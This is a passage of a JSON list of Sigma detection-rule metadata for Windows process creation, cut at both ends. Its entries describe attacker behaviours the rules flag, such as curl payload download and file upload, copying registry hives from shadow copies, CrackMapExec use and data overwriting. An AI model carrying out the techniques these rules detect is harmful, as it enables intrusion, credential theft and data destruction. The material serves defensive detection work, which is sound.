"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_char_in_cmd.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e0552b19-5a83-4222-b141-b36184bb8d79", + "value": "Obfuscated Command Line Using Special Unicode Characters" + }, + { + "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", + "meta": { + "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_child_process_as_system_.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://github.com/antonioCoco/RogueWinRM", + "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.002" + ] + }, + "uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", + "value": "Suspicious Child Process Created as System" + }, + { + "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", + "meta": { + 
"author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_cipher.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cipher.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "4b046706-5789-4673-b111-66f25fe99534", + "value": "Overwrite Deleted Data with Cipher" + }, + { + "description": "Detects suspicious process that use escape characters", + "meta": { + "author": "juju4", + "creation_date": "2018/12/11", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_cli_escape.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/vysecurity/status/885545634958385153", + "https://twitter.com/Hexacorn/status/885553465417756673", + "https://twitter.com/Hexacorn/status/885570278637678592", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", + "value": "Suspicious Commandline Escape" + }, + { + "description": "Detects usage of a CLSID folder name located in a suspicious location from the commandline as seen being used in IcedID", + "meta": { + "author": "Nasreddine 
Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Some FP is expected with some installers" + ], + "filename": "proc_creation_win_susp_clsid_foldername.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Kostastsale/status/1565257924204986369", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "90b63c33-2b97-4631-a011-ceb0f47b77c3", + "value": "Suspicious CLSID Folder Name In Suspicious Locations" + }, + { + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "meta": { + "author": "frack113", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/SysmonEoP", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "178e615d-e666-498b-9630-9ed363038101", + "value": "Suspicious Elevated System Shell" + }, + { + "description": "Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. 
This could be indicative of adversary lateral movement.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_cmd_exectution_via_wmi.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_exectution_via_wmi.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "e31f89f7-36fb-4697-8ab6-48823708353b", + "value": "Suspicious Cmd Execution via WMI" + }, + { + "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/01/16", + "falsepositive": [ + "High" + ], + "filename": "proc_creation_win_susp_cmd_http_appdata.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", + "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "1ac8666b-046f-4201-8aba-1951aaec03a3", + "value": "Command Line Execution with Suspicious URL and AppData Strings" + }, + { + "description": "Detects a copy execution that targets a shadow copy (sometimes used to copy registry hives 
that are in use)", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Some rare backup scenarios" + ], + "filename": "proc_creation_win_susp_cmd_shadowcopy_access.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", + "value": "Copy from Volume Shadow Copy" + }, + { + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "meta": { + "author": "_pete_0, TheDFIRReport", + "creation_date": "2022/02/21", + "falsepositive": [ + "During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section" + ], + "filename": "proc_creation_win_susp_codepage_lookup.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1614.001" + ] + }, + "uuid": "7090adee-82e2-4269-bd59-80691e7c6338", + "value": "CHCP CodePage Locale Lookup" + }, + { + "description": "Detects a code page switch in command line or batch scripts to a rare language", + "meta": { + "author": "Florian 
Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/10/14", + "falsepositive": [ + "Administrative activity (adjust code pages according to your organisation's region)" + ], + "filename": "proc_creation_win_susp_codepage_switch.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", + "https://twitter.com/cglyer/status/1183756892952248325", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml" + ], + "tags": [ + "attack.t1036", + "attack.defense_evasion" + ] + }, + "uuid": "c7942406-33dd-4377-a564-0f62db0593a3", + "value": "Suspicious Code Page Switch" + }, + { + "description": "Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_commandline_chars.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml" + ], + "tags": "No established tags" + }, + "uuid": "2c0d2d7b-30d6-4d14-9751-7b9113042ab9", + "value": "Suspicious Characters in CommandLine" + }, + { + "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. 
seen in PsExec-like tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_command_flag_pattern.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml" + ], + "tags": "No established tags" + }, + "uuid": "50d66fb0-03f8-4da0-8add-84e77d12a020", + "value": "Suspicious RunAs-Like Flag Combination" + }, + { + "description": "Detects suspicious command line arguments of common data compression tools", + "meta": { + "author": "Florian Roth, Samir Bousseaden", + "creation_date": "2019/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_compression_params.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1184067445612535811", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", + "value": "Suspicious Compression Tool Parameters" + }, + { + "description": "Detects the conhost execution as parent process. 
Can be used to evaded defense mechanism.", + "meta": { + "author": "omkar72", + "creation_date": "2020/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_conhost.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "7dc2dedd-7603-461a-bc13-15803d132355", + "value": "Conhost Parent Process Executions" + }, + { + "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_conhost_option.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "3037d961-21e9-4732-b27a-637bcc7bf539", + "value": "Suspicious Conhost Legacy Option" + }, + { + "description": "Detects a suspicious process pattern found in CVE-2021-40444 exploitation", + "meta": { + "author": "@neonprimetime, Florian Roth", + "creation_date": "2021/09/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_control_cve_2021_40444.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", + "https://twitter.com/neonprimetime/status/1435584010202255375", + "https://www.joesandbox.com/analysis/476188/1/iochtml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "894397c6-da03-425c-a589-3d09e7d1f750", + "value": "CVE-2021-40444 Process Pattern" + }, + { + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_control_dll_load.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/rikvduijn/status/853251879320662017", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", + "value": "Suspicious Control Panel DLL Load" + }, + { + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "meta": { + "author": "Florian Roth, oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "creation_date": "2019/12/30", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_copy_lateral_movement.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1211636381086339073", + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", + 
"https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" + ] + }, + "uuid": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", + "value": "Copy from Admin Share" + }, + { + "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", + "meta": { + "author": "Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update)", + "creation_date": "2020/07/03", + "falsepositive": [ + "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", + "When cmd.exe and xcopy.exe are called directly", + "When the command contains the keywords but not in the correct order" + ], + "filename": "proc_creation_win_susp_copy_system32.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": 
"fff9d2b7-e11c-4a69-93d3-40ef66189767", + "value": "Suspicious Copy From or To System32" + }, + { + "description": "Detects suspicious command lines used in Covenant luanchers", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2020/06/04", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_covenant.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/covenant-v0-5-eee0507b85ba", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_covenant.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1564.003" + ] + }, + "uuid": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "value": "Covenant Launcher Indicators" + }, + { + "description": "Detect various execution methods of the CrackMapExec pentesting framework", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2020/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_crackmapexec_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/byt3bl33d3r/CrackMapExec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" + ] + }, + "uuid": "058f4380-962d-40a5-afce-50207d36d7e2", + "value": "CrackMapExec Command Execution" + }, + { + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_susp_crackmapexec_flags.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml" + ], + "tags": "No established tags" + }, + "uuid": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "value": "CrackMapExec Command Line Flags" + }, + { + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2020/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/byt3bl33d3r/CrackMapExec", + "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" + ] + }, + "uuid": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "value": "CrackMapExec PowerShell Obfuscation" + }, + { + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/11", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_susp_csc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1094924091256176641", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" + ] + }, + "uuid": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "value": "Suspicious Parent of Csc.exe" + }, + { + "description": "Adversaries may abuse Visual Basic (VB) for execution", + "meta": { + "author": "frack113", + "creation_date": "2022/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_cscript_vbs.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cscript_vbs.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ] + }, + "uuid": "23250293-eed5-4c39-b57a-841c8933a57d", + "value": "Cscript Visual Basic Script Execution" + }, + { + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. 
AppData)", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/08/24", + "falsepositive": [ + "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", + "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" + ], + "filename": "proc_creation_win_susp_csc_folder.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", + "https://twitter.com/gN3mes1s/status/1206874118282448897", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.004" + ] + }, + "uuid": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "value": "Suspicious Csc.exe Source File Folder" + }, + { + "description": "Detects the use of the lesser known remote execution tool named CsExec (a PsExec alternative)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_csexec.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/malcomvetter/CSExec", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csexec.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "value": "CsExec Remote 
Execution Tool Usage" + }, + { + "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", + "meta": { + "author": "Konstantin Grishchenko, oscd.community", + "creation_date": "2020/10/17", + "falsepositive": [ + "Legitimate usage by software developers" + ], + "filename": "proc_creation_win_susp_csi.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", + "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", + "https://twitter.com/Z3Jpa29z/status/1317545798981324801", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml" + ], + "tags": [ + "attack.execution", + "attack.t1072", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "40b95d31-1afc-469e-8d34-9a3a667d058e", + "value": "Suspicious Csi.exe Usage" + }, + { + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali (updated)", + "creation_date": "2020/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_curl_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/max_mal_/status/1542461200797163522", + "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", + 
"https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", + "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "value": "Suspicious Curl Usage on Windows" + }, + { + "description": "Detects a suspicious curl process start the adds a file to a web request", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/03", + "falsepositive": [ + "Scripts created by developers and admins" + ], + "filename": "proc_creation_win_susp_curl_fileupload.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://curl.se/docs/manpage.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567", + "attack.t1105" + ] + }, + "uuid": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "value": "Suspicious Curl File Upload" + }, + { + "description": "Adversaries can use curl to download payloads remotely and execute them. 
Curl is included by default in Windows 10 build 17063 and later.", + "meta": { + "author": "Sreeman, Nasreddine Bencherchali", + "creation_date": "2020/01/13", + "falsepositive": [ + "Administrative scripts (installers)" + ], + "filename": "proc_creation_win_susp_curl_start_combo.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_start_combo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", + "value": "Curl Start Combination" + }, + { + "description": "Detects a suspicious curl process start on Windows with set useragent options", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_win_susp_curl_useragent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://curl.se/docs/manpage.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_useragent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "3286d37a-00fd-41c2-a624-a672dcd34e60", + "value": "Suspicious Curl Change User Agents" + }, + { + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/01/28", + "falsepositive": [ + "Unknown yet" + ], + "filename": 
"proc_creation_win_susp_dctask64_proc_inject.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/gN3mes1s/status/1222088214581825540", + "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ] + }, + "uuid": "6345b048-8441-43a7-9bed-541133633d7a", + "value": "ZOHO Dctask64 Process Injection" + }, + { + "description": "Detects suspicious command line to remove and 'exe' or 'dll'", + "meta": { + "author": "frack113", + "creation_date": "2021/12/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_del.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_del.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "204b17ae-4007-471b-917b-b917b315c5db", + "value": "Suspicious Del in CommandLine" + }, + { + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/03", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": 